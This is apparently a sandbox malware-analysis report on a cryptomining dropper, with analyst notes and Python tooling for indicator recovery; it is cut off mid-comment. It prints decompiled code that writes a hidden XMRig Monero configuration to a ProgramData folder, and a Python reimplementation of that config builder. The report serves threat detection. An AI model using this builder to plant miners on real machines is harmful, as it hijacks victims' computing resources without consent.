                                                                                                        							goto L17;
                                                                                                        						} else {
                                                                                                        							_t139 = 1;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					goto L18;
                                                                                                        				} else {
                                                                                                        					if( *0x5d1308 != 2) {
                                                                                                        						E004017E0( &_v12, "1");
                                                                                                        					} else {
                                                                                                        						_t137 = _v108.dwNumberOfProcessors;
                                                                                                        						L11:
                                                                                                        						asm("cdq");
                                                                                                        						_t137 = _t137 - _t334 >> 1;
                                                                                                        						if(_t137 >= 1) {
                                                                                                        							L17:
                                                                                                        							_t139 =  >  ? 0xff : _t137;
                                                                                                        						} else {
                                                                                                        							_t139 = 1;
                                                                                                        						}
                                                                                                        						L18:
                                                                                                        						_t331 =  &_v12;
                                                                                                        						E00401550(_t139,  &_v12);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movq [ebp-0x10], xmm0");
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push( &_v20);
                                                                                                        				_push( &_v2676);
                                                                                                        				if( *0x5d10b8() != 1) {
                                                                                                        					L29:
                                                                                                        					return 0; // executed
                                                                                                        				} else {
                                                                                                        					_v56 = 0x18;
                                                                                                        					_v48 =  &_v20;
                                                                                                        					_v52 = 0;
                                                                                                        					_v44 = 0x40;
                                                                                                        					_v40 = 0;
                                                                                                        					_v36 = 0;
                                                                                                        					_t150 = NtCreateFile( &_a4, 0x120116,  &_v56,  &_v32,  &_v64, 0x80, 0, 0, 0x60, 0, 0); // executed
                                                                                                        					if(_t150 != 0) {
                                                                                                        						goto L29;
                                                                                                        					} else {
                                                                                                        						E004017E0( &_v2156, "{\r\n\t\"api\": {");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"id\": null,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"worker-id\": null");
                                                                                                        						E004016E0( &_v2156, "\r\n\t},");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"http\": {");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"enabled\": false");
                                                                                                        						E004016E0( &_v2156, "\r\n\t},");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"autosave\": false,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"version\": 1,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"background\": false,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"colors\": true,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"randomx\": {");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"init\": 1,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"numa\": true");
                                                                                                        						E004016E0( &_v2156, "\r\n\t},");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"cpu\": {");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"enabled\": true,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"huge-pages\": true,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"hw-aes\": null,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"priority\": null,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"memory-pool\": false,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"asm\": true,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"argon2-impl\": null,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cpu-profile\": {");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"threads\": ");
                                                                                                        						E004016E0( &_v2156,  &_v12);
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t},");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/0\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/xhv\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn-heavy/tube\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/0\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn-lite/1\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn/r\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn/fast\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn-gpu\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn/half\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"cn/2\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"argon2/chukwa\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"argon2/wrkz\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"rx\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"rx/0\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"rx/loki\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"rx/wow\": \"cpu-profile\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\"rx/arq\": \"cpu-profile\"");
                                                                                                        						E004016E0( &_v2156, "\r\n\t},");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"donate-level\": ");
                                                                                                        						E004016E0( &_v2156, "0");
                                                                                                        						E004016E0( &_v2156, ",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"donate-over-proxy\": 0,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"log-file\": null,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"pools\": [");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t{");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"algo\": null,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"coin\": \"monero\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"url\": \"");
                                                                                                        						E004016E0( &_v2156, _a8);
                                                                                                        						E004016E0( &_v2156, "\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"user\": \"");
                                                                                                        						E004016E0( &_v2156, _a12);
                                                                                                        						E004016E0( &_v2156, "\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"pass\": \"");
                                                                                                        						E004016E0( &_v2156, _a16);
                                                                                                        						E004016E0( &_v2156, "\",");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"rig-id\": null,");
                                                                                                        						_t282 =  &_v2156;
                                                                                                        						if(_a20 == 0) {
                                                                                                        							_push("\r\n\t\t\t\"nicehash\": false,");
                                                                                                        						} else {
                                                                                                        							_push("\r\n\t\t\t\"nicehash\": true,");
                                                                                                        						}
                                                                                                        						_push(_t282);
                                                                                                        						E004016E0();
                                                                                                        						_t284 =  &_v2156;
                                                                                                        						if( *0x5d1c24 == 0) {
                                                                                                        							_push("\r\n\t\t\t\"keepalive\": false,");
                                                                                                        						} else {
                                                                                                        							_push("\r\n\t\t\t\"keepalive\": true,");
                                                                                                        						}
                                                                                                        						E004016E0();
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"enabled\": true,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"tls\": false,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"tls-fingerprint\": null,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"daemon\": false,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t\t\"self-select\": null");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\t}");
                                                                                                        						E004016E0( &_v2156, "\r\n\t],");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"print-time\": 60,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"health-print-time\": 60,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"retries\": 5,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"retry-pause\": 5,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"syslog\": false,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"user-agent\": null,");
                                                                                                        						E004016E0( &_v2156, "\r\n\t\"watch\": false");
                                                                                                        						E004016E0( &_v2156, "\r\n}");
                                                                                                        						_t321 = E004088D0(_t331,  &_v2156, E00401850( &_v2156) + 1,  &_v24);
                                                                                                        						_t323 =  *0x5d10c0(_a4, 0, 0, 0,  &_v32, _t321, _v24,  &_v72, 0, _t284); // executed
                                                                                                        						_push(_a4);
                                                                                                        						if(_t323 == 0) {
                                                                                                        							NtClose(); // executed
                                                                                                        							_push(_v16);
                                                                                                        							E00403720(_t334, _t336, _v20); // executed
                                                                                                        							return 1;
                                                                                                        						} else {
                                                                                                        							NtClose();
                                                                                                        							goto L29;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
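Analyst note on the function above (added to this report; not part of the sandbox output). E00403CA0 closes any stale handle held in the two globals, builds the path C:\ProgramData\LKBNMTFJgl\cfg (or \cfgi when _a4 is non-zero), and derives a thread count from GetSystemInfo().dwNumberOfProcessors: either the literal "1", the core count halved (the cdq/sub/sar sequence is a signed divide by two) and clamped to 1..255, or the raw core count clamped the same way, depending on two global flags. It converts the path through the unresolved import at 0x5d10b8 and opens the file with NtCreateFile using DesiredAccess 0x120116 (FILE_GENERIC_WRITE), an OBJECT_ATTRIBUTES with Attributes 0x40 (OBJ_CASE_INSENSITIVE), FileAttributes 0x80 (FILE_ATTRIBUTE_NORMAL), CreateDisposition 0 (FILE_SUPERSEDE) and CreateOptions 0x60 (FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE). It then concatenates an XMRig JSON configuration with donate-level 0 and a single "monero" pool whose url, user and pass are the _a8/_a12/_a16 arguments, and writes it through the unresolved import at 0x5d10c0. Two caveats for anyone triaging the dropped file: the helper roles (E004017E0 as string assign, E004016E0 as append, E00401550 as integer-to-string) are inferred from usage, not resolved by the decompiler; and the buffer is passed through E004088D0 before the write, so the bytes on disk may not be the plain JSON shown here. The example below reproduces the builder so an analyst can generate the expected artifact for a given pool/wallet/core count, and parses a recovered config back into indicators. It is added tooling, not code from the sample; the pool values in the demo are constructed, and the two global flags are modelled as booleans.

```python
"""Reconstruct and parse the XMRig config written by E00403CA0.

Added analyst tooling for this report, not code from the sample. Helper
roles are inferred from usage; the flags read at 0x5d1308 / 0x5d130c are
modelled as booleans (assumption). Assumes the on-disk file is plain JSON,
which must be verified because the buffer passes through E004088D0 first.
"""
import json
from typing import Any, Dict

DROP_DIR = r"C:\ProgramData\LKBNMTFJgl"   # literal from the decompiled function
CFG_NAMES = ("cfg", "cfgi")               # "\\cfg" when _a4 == 0, "\\cfgi" otherwise
BUFFER_SIZE = 0x800                       # size the builder zeroes before appending

# Algorithms mapped onto the single "cpu-profile", in the order the builder emits them.
ALGOS = [
    "cn-heavy/0", "cn-heavy/xhv", "cn-heavy/tube", "cn-lite/0", "cn-lite/1",
    "cn", "cn/r", "cn/fast", "cn-gpu", "cn/half", "cn/2",
    "argon2/chukwa", "argon2/wrkz", "rx", "rx/0", "rx/loki", "rx/wow", "rx/arq",
]


def thread_count(num_processors: int, second_config: bool,
                 flag_5d1308_is_2: bool, flag_5d130c_is_1: bool) -> str:
    """Mirror the thread selection that follows GetSystemInfo().

    second_config is the _a4 != 0 ("cfgi") case. The result is the string
    the builder splices after "threads": either the literal "1" or an
    integer clamped to 1..255 (the `>= 1` test plus the `? 0xff :` cap).
    """
    half = num_processors // 2            # cdq / sub / sar: signed divide by two
    if second_config:
        n = num_processors if flag_5d130c_is_1 else half
    else:
        if not flag_5d1308_is_2:
            return "1"
        n = half
    return str(min(max(n, 1), 0xFF))


def build_config(pool_url: str, user: str, password: str, threads: str,
                 nicehash: bool, keepalive: bool) -> str:
    """Emit the JSON exactly as the builder concatenates it (CRLF + tabs)."""
    lines = [
        '{', '\t"api": {', '\t\t"id": null,', '\t\t"worker-id": null', '\t},',
        '\t"http": {', '\t\t"enabled": false', '\t},',
        '\t"autosave": false,', '\t"version": 1,', '\t"background": false,',
        '\t"colors": true,', '\t"randomx": {', '\t\t"init": 1,', '\t\t"numa": true',
        '\t},', '\t"cpu": {', '\t\t"enabled": true,', '\t\t"huge-pages": true,',
        '\t\t"hw-aes": null,', '\t\t"priority": null,', '\t\t"memory-pool": false,',
        '\t\t"asm": true,', '\t\t"argon2-impl": null,', '\t\t"cpu-profile": {',
        '\t\t\t"threads": ' + threads, '\t\t},',
    ]
    lines += ['\t\t"%s": "cpu-profile",' % a for a in ALGOS[:-1]]
    lines += [
        '\t\t"%s": "cpu-profile"' % ALGOS[-1], '\t},',
        '\t"donate-level": 0,', '\t"donate-over-proxy": 0,', '\t"log-file": null,',
        '\t"pools": [', '\t\t{', '\t\t\t"algo": null,', '\t\t\t"coin": "monero",',
        '\t\t\t"url": "%s",' % pool_url, '\t\t\t"user": "%s",' % user,
        '\t\t\t"pass": "%s",' % password, '\t\t\t"rig-id": null,',
        '\t\t\t"nicehash": %s,' % ("true" if nicehash else "false"),
        '\t\t\t"keepalive": %s,' % ("true" if keepalive else "false"),
        '\t\t\t"enabled": true,', '\t\t\t"tls": false,',
        '\t\t\t"tls-fingerprint": null,', '\t\t\t"daemon": false,',
        '\t\t\t"self-select": null', '\t\t}', '\t],',
        '\t"print-time": 60,', '\t"health-print-time": 60,', '\t"retries": 5,',
        '\t"retry-pause": 5,', '\t"syslog": false,', '\t"user-agent": null,',
        '\t"watch": false', '}',
    ]
    return "\r\n".join(lines)


def parse_dropped_config(text: str) -> Dict[str, Any]:
    """Pull indicators out of a recovered cfg/cfgi and check it against the template."""
    cfg = json.loads(text)
    pools = cfg.get("pools", [])
    if len(pools) != 1:
        raise ValueError("expected exactly one pool entry, got %d" % len(pools))
    pool = pools[0]
    cpu = cfg.get("cpu", {})
    return {
        "pool_url": pool.get("url"),
        "wallet_or_login": pool.get("user"),
        "password": pool.get("pass"),
        "coin": pool.get("coin"),
        "nicehash": pool.get("nicehash"),
        "keepalive": pool.get("keepalive"),
        "threads": cpu.get("cpu-profile", {}).get("threads"),
        "donate_level": cfg.get("donate-level"),
        "matches_builder": (
            cfg.get("donate-level") == 0
            and cfg.get("http", {}).get("enabled") is False
            and pool.get("coin") == "monero"
            and all(cpu.get(a) == "cpu-profile" for a in ALGOS)
        ),
    }


if __name__ == "__main__":
    # Constructed demo values; not indicators from the sample.
    demo = build_config("pool.example.invalid:3333", "4DEMOWALLET", "x",
                        thread_count(8, False, True, False), False, True)
    print(parse_dropped_config(demo))
```

build_config() output fits the 0x800-byte buffer for ordinary pool strings (about 1.5 KB of template plus the url/user/pass lengths), so a recovered file noticeably larger than that is a sign the on-disk form is not the plain template. Point parse_dropped_config() at the contents of C:\ProgramData\LKBNMTFJgl\cfg and \cfgi; the url and user fields are the pool and wallet indicators worth blocking and hunting for.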
                                                                                                        0x00403da6
                                                                                                        0x00403da4
                                                                                                        0x00000000
                                                                                                        0x00403d68
                                                                                                        0x00403d6f
                                                                                                        0x00403d8e
                                                                                                        0x00403d71
                                                                                                        0x00403d71
                                                                                                        0x00403d74
                                                                                                        0x00403d74
                                                                                                        0x00403d77
                                                                                                        0x00403d7c
                                                                                                        0x00403dad
                                                                                                        0x00403db7
                                                                                                        0x00403d7e
                                                                                                        0x00403d7e
                                                                                                        0x00403d7e
                                                                                                        0x00403dba
                                                                                                        0x00403dba
                                                                                                        0x00403dbf
                                                                                                        0x00403dbf
                                                                                                        0x00403d6f
                                                                                                        0x00403dca
                                                                                                        0x00403dcd
                                                                                                        0x00403dd2
                                                                                                        0x00403dd4
                                                                                                        0x00403dd6
                                                                                                        0x00403ddd
                                                                                                        0x00403de6
                                                                                                        0x00404444
                                                                                                        0x0040444a
                                                                                                        0x00403dec
                                                                                                        0x00403dfe
                                                                                                        0x00403e05
                                                                                                        0x00403e0f
                                                                                                        0x00403e1a
                                                                                                        0x00403e2a
                                                                                                        0x00403e32
                                                                                                        0x00403e39
                                                                                                        0x00403e41
                                                                                                        0x00000000
                                                                                                        0x00403e47
                                                                                                        0x00403e53
                                                                                                        0x00403e64
                                                                                                        0x00403e75
                                                                                                        0x00403e86
                                                                                                        0x00403e97
                                                                                                        0x00403ea8
                                                                                                        0x00403eb9
                                                                                                        0x00403eca
                                                                                                        0x00403ede
                                                                                                        0x00403eef
                                                                                                        0x00403f00
                                                                                                        0x00403f11
                                                                                                        0x00403f22
                                                                                                        0x00403f33
                                                                                                        0x00403f44
                                                                                                        0x00403f55
                                                                                                        0x00403f69
                                                                                                        0x00403f7a
                                                                                                        0x00403f8b
                                                                                                        0x00403f9c
                                                                                                        0x00403fad
                                                                                                        0x00403fbe
                                                                                                        0x00403fcf
                                                                                                        0x00403fe0
                                                                                                        0x00403ff4
                                                                                                        0x00404004
                                                                                                        0x00404015
                                                                                                        0x00404026
                                                                                                        0x00404037
                                                                                                        0x00404048
                                                                                                        0x00404059
                                                                                                        0x0040406a
                                                                                                        0x0040407e
                                                                                                        0x0040408f
                                                                                                        0x004040a0
                                                                                                        0x004040b1
                                                                                                        0x004040c2
                                                                                                        0x004040d3
                                                                                                        0x004040e4
                                                                                                        0x004040f5
                                                                                                        0x00404109
                                                                                                        0x0040411a
                                                                                                        0x0040412b
                                                                                                        0x0040413c
                                                                                                        0x0040414d
                                                                                                        0x0040415e
                                                                                                        0x0040416f
                                                                                                        0x00404180
                                                                                                        0x00404194
                                                                                                        0x004041a5
                                                                                                        0x004041b6
                                                                                                        0x004041c7
                                                                                                        0x004041d8
                                                                                                        0x004041e9
                                                                                                        0x004041fa
                                                                                                        0x0040420b
                                                                                                        0x0040421d
                                                                                                        0x0040422e
                                                                                                        0x0040423f
                                                                                                        0x0040424e
                                                                                                        0x0040425f
                                                                                                        0x00404270
                                                                                                        0x0040427f
                                                                                                        0x00404290
                                                                                                        0x004042a4
                                                                                                        0x004042ac
                                                                                                        0x004042b6
                                                                                                        0x004042bf
                                                                                                        0x004042b8
                                                                                                        0x004042b8
                                                                                                        0x004042b8
                                                                                                        0x004042c4
                                                                                                        0x004042c5
                                                                                                        0x004042cd
                                                                                                        0x004042da
                                                                                                        0x004042e3
                                                                                                        0x004042dc
                                                                                                        0x004042dc
                                                                                                        0x004042dc
                                                                                                        0x004042e9
                                                                                                        0x004042fd
                                                                                                        0x0040430e
                                                                                                        0x0040431f
                                                                                                        0x00404330
                                                                                                        0x00404341
                                                                                                        0x00404352
                                                                                                        0x00404363
                                                                                                        0x00404374
                                                                                                        0x00404388
                                                                                                        0x00404399
                                                                                                        0x004043aa
                                                                                                        0x004043bb
                                                                                                        0x004043cc
                                                                                                        0x004043dd
                                                                                                        0x004043ee
                                                                                                        0x00404412
                                                                                                        0x00404431
                                                                                                        0x00404437
                                                                                                        0x0040443c
                                                                                                        0x0040444b
                                                                                                        0x00404451
                                                                                                        0x00404458
                                                                                                        0x00404469
                                                                                                        0x0040443e
                                                                                                        0x0040443e
                                                                                                        0x00000000
                                                                                                        0x0040443e
                                                                                                        0x0040443c
                                                                                                        0x00403e41

                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(00000324), ref: 00403CC5
                                                                                                        • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00000000), ref: 00403D5E
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(?,00000001,00000000,00000000), ref: 00403DDE
                                                                                                        • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403E39
                                                                                                        • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00404821,00000000,00000000), ref: 00404431
                                                                                                        • NtClose.NTDLL(00000000), ref: 0040443E
                                                                                                        • NtClose.NTDLL(00000000), ref: 0040444B
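The argument list for the NtCreateFile call above is the sandbox's stack snapshot at call time: the FileHandle, IoStatusBlock and ObjectAttributes slots (0, 0, 0x18) are not meaningful as shown, but DesiredAccess 0x00120116, ShareAccess 0, CreateDisposition 0 and CreateOptions 0x60 are plain flag words. The following Python helper is an added example, not part of the report or of the sample; it decodes those four values against the documented ntifs.h/winnt.h constants (reproduced below and assumed exact) so the intent of the open is readable. Read that way, the call asks for FILE_GENERIC_WRITE, exclusive share, synchronous non-directory I/O and FILE_SUPERSEDE, i.e. any existing file at the path is replaced rather than appended to; that reading rests on the snapshot being accurate, which the report does not itself assert.

```python
import json

# Individual ACCESS_MASK bits for file objects (winnt.h / ntifs.h values).
FILE_RIGHTS = {
    0x00000001: "FILE_READ_DATA",
    0x00000002: "FILE_WRITE_DATA",
    0x00000004: "FILE_APPEND_DATA",
    0x00000008: "FILE_READ_EA",
    0x00000010: "FILE_WRITE_EA",
    0x00000020: "FILE_EXECUTE",
    0x00000040: "FILE_DELETE_CHILD",
    0x00000080: "FILE_READ_ATTRIBUTES",
    0x00000100: "FILE_WRITE_ATTRIBUTES",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
    0x01000000: "ACCESS_SYSTEM_SECURITY",
    0x02000000: "MAXIMUM_ALLOWED",
    0x10000000: "GENERIC_ALL",
    0x20000000: "GENERIC_EXECUTE",
    0x40000000: "GENERIC_WRITE",
    0x80000000: "GENERIC_READ",
}
# Composite masks the headers define; matching one is the quickest tell of intent.
GENERIC_FILE_MASKS = {
    0x00120089: "FILE_GENERIC_READ",
    0x00120116: "FILE_GENERIC_WRITE",
    0x001200A0: "FILE_GENERIC_EXECUTE",
}
CREATE_DISPOSITION = {
    0: "FILE_SUPERSEDE", 1: "FILE_OPEN", 2: "FILE_CREATE",
    3: "FILE_OPEN_IF", 4: "FILE_OVERWRITE", 5: "FILE_OVERWRITE_IF",
}
CREATE_OPTIONS = {
    0x00000001: "FILE_DIRECTORY_FILE",
    0x00000002: "FILE_WRITE_THROUGH",
    0x00000004: "FILE_SEQUENTIAL_ONLY",
    0x00000008: "FILE_NO_INTERMEDIATE_BUFFERING",
    0x00000010: "FILE_SYNCHRONOUS_IO_ALERT",
    0x00000020: "FILE_SYNCHRONOUS_IO_NONALERT",
    0x00000040: "FILE_NON_DIRECTORY_FILE",
    0x00000080: "FILE_CREATE_TREE_CONNECTION",
    0x00000100: "FILE_COMPLETE_IF_OPLOCKED",
    0x00000200: "FILE_NO_EA_KNOWLEDGE",
    0x00000800: "FILE_RANDOM_ACCESS",
    0x00001000: "FILE_DELETE_ON_CLOSE",
    0x00002000: "FILE_OPEN_BY_FILE_ID",
    0x00004000: "FILE_OPEN_FOR_BACKUP_INTENT",
}
SHARE_ACCESS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}

WRITE_RIGHTS = {"FILE_WRITE_DATA", "FILE_APPEND_DATA", "GENERIC_WRITE", "GENERIC_ALL", "MAXIMUM_ALLOWED"}
CREATING = {"FILE_SUPERSEDE", "FILE_CREATE", "FILE_OPEN_IF", "FILE_OVERWRITE", "FILE_OVERWRITE_IF"}


def decode_flags(value, table):
    """Split a bitmask into the names of set bits known to `table`, plus any unknown residue."""
    known = 0
    for bit in table:
        known |= bit
    return {
        "flags": [name for bit, name in table.items() if value & bit],
        "residue": value & ~known & 0xFFFFFFFF,
    }


def decode_ntcreatefile(desired_access, share_access, create_disposition, create_options):
    """Decode the scalar NtCreateFile arguments into names; pointer arguments are ignored."""
    access = decode_flags(desired_access, FILE_RIGHTS)
    access["composite"] = GENERIC_FILE_MASKS.get(desired_access)
    share = decode_flags(share_access, SHARE_ACCESS)["flags"]
    return {
        "access": access,
        "share": share or ["exclusive"],
        "disposition": CREATE_DISPOSITION.get(create_disposition, f"unknown({create_disposition:#x})"),
        "options": decode_flags(create_options, CREATE_OPTIONS),
    }


def classify_intent(decoded):
    """Coarse analyst verdict: does the call write, and does it create/replace the file?"""
    writes = bool(WRITE_RIGHTS & set(decoded["access"]["flags"]))
    creates = decoded["disposition"] in CREATING
    if writes and creates:
        return "replace-or-create with write access"
    if writes:
        return "open existing for write"
    if creates:
        return "create without write access"
    return "read-only open"


if __name__ == "__main__":
    # Values taken from the NtCreateFile line of this report (DesiredAccess,
    # ShareAccess, CreateDisposition, CreateOptions).
    call = decode_ntcreatefile(0x00120116, 0x0, 0x0, 0x60)
    print(json.dumps(call, indent=2))
    print(classify_intent(call))
```

The residue field is the check that matters when a decoder like this is applied to other calls: a non-zero residue means the table is missing a bit and the verdict should not be trusted until it is identified.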
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close$FilePath$CreateInfoNameName_SystemWrite
                                                                                                        • String ID: "algo": null,$"coin": "monero",$"daemon": false,$"enabled": true,$"keepalive": false,$"keepalive": true,$"nicehash": false,$"nicehash": true,$"pass": "$"rig-id": null,$"self-select": null$"threads": $"tls": false,$"tls-fingerprint": null,$"url": "$"user": "$"argon2-impl": null,$"argon2/chukwa": "cpu-profile",$"argon2/wrkz": "cpu-profile",$"asm": true,$"cn": "cpu-profile",$"cn-gpu": "cpu-profile",$"cn-heavy/0": "cpu-profile",$"cn-heavy/tube": "cpu-profile",$"cn-heavy/xhv": "cpu-profile",$"cn-lite/0": "cpu-profile",$"cn-lite/1": "cpu-profile",$"cn/2": "cpu-profile",$"cn/fast": "cpu-profile",$"cn/half": "cpu-profile",$"cn/r": "cpu-profile",$"cpu-profile": {$"enabled": false$"enabled": true,$"huge-pages": true,$"hw-aes": null,$"id": null,$"init": 1,$"memory-pool": false,$"numa": true$"priority": null,$"rx": "cpu-profile",$"rx/0": "cpu-profile",$"rx/arq": "cpu-profile"$"rx/loki": "cpu-profile",$"rx/wow": "cpu-profile",$"worker-id": null${$}$},$"autosave": false,$"background": false,$"colors": true,$"cpu": {$"donate-level": $"donate-over-proxy": 0,$"health-print-time": 60,$"http": {$"log-file": null,$"pools": [$"print-time": 60,$"randomx": {$"retries": 5,$"retry-pause": 5,$"syslog": false,$"user-agent": null,$"version": 1,$"watch": false$],$},$},$},$},$}$@$C:\ProgramData\LKBNMTFJgl$\cfg$\cfgi${"api": {
                                                                                                        • API String ID: 3784785972-1821464420
                                                                                                        • Opcode ID: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
                                                                                                        • Instruction ID: 0c6b8c97c8f286fc2f2609601cf0158cca0e688ef71c127dda3ca6300913d252
                                                                                                        • Opcode Fuzzy Hash: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
                                                                                                        • Instruction Fuzzy Hash: DE020771E5021CA6CB50EEE18C86FCE73ECAB04744F554677B148B21D2DEBEDA848B58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
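The String IDs above are the pieces of an xmrig config template: the fragments ending in an open quote or colon (`"url": "`, `"user": "`, `"pass": "`, `"threads": `, `"donate-level": `) are where the function splices in the pool, wallet, password, thread count and donate level before the finished JSON is written to the file under C:\ProgramData\LKBNMTFJgl. Recovering the completed document from a memory dump or from the dropped cfg file is what yields the pool and wallet indicators. The following Python is an added example and not part of the report or of the sample: it scores a buffer by the density of xmrig-specific keys (useful when only the template survives, as in this dump) and carves and parses any balanced JSON object that starts with the template's first fragment `{"api": {`, returning the pool entries. The sample buffer, the pool host `pool.example.invalid:3333` and the wallet placeholder are constructed here; none of those values come from the sample's actual configuration.

```python
import json

# Keys the report lists as fragments of the embedded xmrig config template.
XMRIG_MARKERS = (
    b'"donate-level"', b'"donate-over-proxy"', b'"cpu-profile"', b'"huge-pages"',
    b'"randomx"', b'"rx/0"', b'"cn/r"', b'"nicehash"', b'"rig-id"',
    b'"self-select"', b'"tls-fingerprint"', b'"health-print-time"',
)
CONFIG_START = b'{"api": {'   # first fragment of the template in the report


def marker_hits(buf):
    """Count each xmrig-specific key present in `buf`; works on template fragments too."""
    return {m.decode(): buf.count(m) for m in XMRIG_MARKERS if m in buf}


def carve_json_object(buf, start):
    """Return the balanced {...} starting at `start`, ignoring braces inside strings; None if unbalanced."""
    depth, in_str, esc = 0, False, False
    for i in range(start, len(buf)):
        c = buf[i]
        if in_str:
            if esc:
                esc = False
            elif c == 0x5C:          # backslash starts an escape
                esc = True
            elif c == 0x22:          # closing quote
                in_str = False
            continue
        if c == 0x22:
            in_str = True
        elif c == 0x7B:              # {
            depth += 1
        elif c == 0x7D:              # }
            depth -= 1
            if depth == 0:
                return buf[start:i + 1]
    return None


def extract_xmrig_configs(buf):
    """Carve and parse every config starting with CONFIG_START; return one summary per pool."""
    found = []
    pos = 0
    while (start := buf.find(CONFIG_START, pos)) >= 0:
        pos = start + len(CONFIG_START)
        raw = carve_json_object(buf, start)
        if raw is None:              # template fragment or truncated dump: no complete object here
            continue
        try:
            cfg = json.loads(raw.decode("utf-8", "replace"))
        except json.JSONDecodeError:
            continue
        for pool in cfg.get("pools", []):
            found.append({
                "url": pool.get("url"), "user": pool.get("user"), "pass": pool.get("pass"),
                "algo": pool.get("algo"), "coin": pool.get("coin"), "tls": pool.get("tls"),
                "nicehash": pool.get("nicehash"),
                "donate_level": cfg.get("donate-level"),
                "background": cfg.get("background"),
            })
    return found


# Constructed sample buffer (not recovered from the sample): the template keys
# from the report completed with placeholder values, wrapped in filler bytes
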